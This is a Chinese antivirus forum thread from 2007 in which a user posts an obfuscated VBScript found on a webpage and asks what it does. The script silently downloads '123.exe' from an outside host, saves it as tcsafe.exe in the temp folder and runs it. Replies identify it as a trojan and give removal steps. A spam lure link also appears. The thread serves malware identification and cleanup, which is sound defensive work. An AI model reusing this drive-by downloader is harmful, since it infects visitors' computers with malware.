瑞星卡卡安全论坛技术交流区反病毒/反流氓软件论坛 【求助】看看这段代码会产生什么效果?本人冒死打开这网站却什么都没发生?

1234   1  /  4  页   跳转

【求助】看看这段代码会产生什么效果?本人冒死打开这网站却什么都没发生?

【求助】看看这段代码会产生什么效果?本人冒死打开这网站却什么都没发生?

<script language="VBScript">
on error resume next
tc = "http://www.ahwlqy.com/123.exe"
k1="c"&"l"
k2="s"&"i"&"d:"
c1=k1&k2
b1="o"&"b"&"j"
b2="e"&"c"&"t"
m1=b1&b2
m2="c"&"l"&"a"&"s"&"s"&"i"&"d"
m3=c1&"B"&"D"&"9"&"6"&"C"&"5"&"5"&"6"&"-"&"6"&"5"&"A"&"3"&"-"&"1"&"1"&"D"&"0"&"-"&"9"&"8"&"3"&"A"&"-"&"0"&"0"&"C"&"0"&"4"&"F"&"C"&"2"&"9"&"E"&"3"&"6"
m4="M"&"i"&"c"&"r"&"o"&"s"&"o"&"f"&"t"&"."&"X"&"M"&"L"&"H"&"T"&"T"&"P"
m5="S"&"h"&"e"&"l"&"l"&"."&"A"&"p"&"p"&"l"&"i"&"c"&"a"&"t"&"i"&"o"&"n"
m6="S"&"c"&"r"&"i"&"p"&"t"&"i"&"n"&"g"&"."&"F"&"i"&"l"&"e"&"S"&"y"&"s"&"t"&"e"&"m"&"O"&"b"&"j"&"e"&"c"&"t"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="o"&"p"&"e"&"n"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="A"&"d"&"o"
a2="d"&"b"&"."
a3="S"&"t"&"r"
a4="e"&"a"&"m"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="G"&"E"&"T"
Xd.Open Xh, tc, False
Xd.Send
X9="tcsafe.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
sub tcsafe2exe(Xe,X9)
X9= Xb.BuildPath(Xe,X9)
end sub
Xa.open
X8="X"&"a"&"."&"B"&"u"&"i"&"l"&"d"&"P"&"a"&"t"&"h(Xa,X8)"
X7="Xb.B"&"ui"&"ld"&"Pa"&"th(Xb,X7)"
X6="Xc.B"&"u"&"il"&"dP"&"at"&"h(Xd,X6)"
X5="X"&"d.Bu"&"il"&"dP"&"a"&"t"&"h(Xf,X5)"
X4="Xe.B"&"ui"&"ld"&"Pa"&"t"&"h(Xg,X4)"
X3="X"&"f.Bu"&"il"&"d"&"Pa"&"t"&"h(Xh,X4)"
X2="Xg.B"&"ui"&"l"&"d"&"Pa"&"t"&"h(Xi,X3)"
X1="Xh.B"&"u"&"i"&"ld"&"Pa"&"t"&"h(Xg,X1)"
z0="Xi.B"&"u"&"i"&"ld"&"P"&"a"&"th(Xk,X0)"
X0=z0
call tcsafe2exe(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
<script language="JavaScript" charset="gb2312" type="text/javascript" src="http://www8.itsun.com/count.php?uuid=1712118&style=text&textcolor=black"></script>
最后编辑2007-03-15 17:55:42.247000000
分享到:
gototop
 

【回复“纳兰明珠”的帖子】
http://www.ahwlqy.com/123.exe——————木马
下载运行后释放两个文件(图1),那个jmp插入explorer进程。强制卸除explorer进程中的jmp后,两个木马文件可直接删除。
需要删除的注册表项见图2。还有HKCR\CLSID\{754FB7D8-B8FE-4810-B363-A788CD060F1F}也要删除。
图1

附件附件:

下载次数:285
文件类型:image/pjpeg
文件大小:
上传时间:2007-3-15 9:25:30
描述:
预览信息:EXIF信息



gototop
 

图2

附件附件:

下载次数:237
文件类型:image/pjpeg
文件大小:
上传时间:2007-3-15 9:26:18
描述:
预览信息:EXIF信息



gototop
 

为什么SSM没任何提示呢?
我看看。。。
gototop
 

引用:
【纳兰明珠的贴子】为什么SSM没任何提示呢?
我看看。。。
………………

附件附件:

下载次数:279
文件类型:image/pjpeg
文件大小:
上传时间:2007-3-15 9:51:26
描述:
预览信息:EXIF信息



gototop
 

不是呀,,我是说打开网页没有提示任何东西。。。。
gototop
 

引用:
【纳兰明珠的贴子】不是呀,,我是说打开网页没有提示任何东西。。。。
………………

没新程序运行,SSM提示啥?
gototop
 

无提示,打开网页,空的,什么都没提示,也没发现下载或运行了什么程序。。。不敢关机了:(
gototop
 

引用:
【纳兰明珠的贴子】无提示,打开网页,空的,什么都没提示,也没发现下载或运行了什么程序。。。不敢关机了:(
………………

那个网址?
gototop
 

ャo乖 ︶~*乖()  (2007-03-14 21:41:37)
> www.ahwlqb.com/123.html这里有我的照片大家来看下顺便给个评价谢谢了  -./>>
gototop
 
1234   1  /  4  页   跳转
页面顶部
Powered by Discuz!NT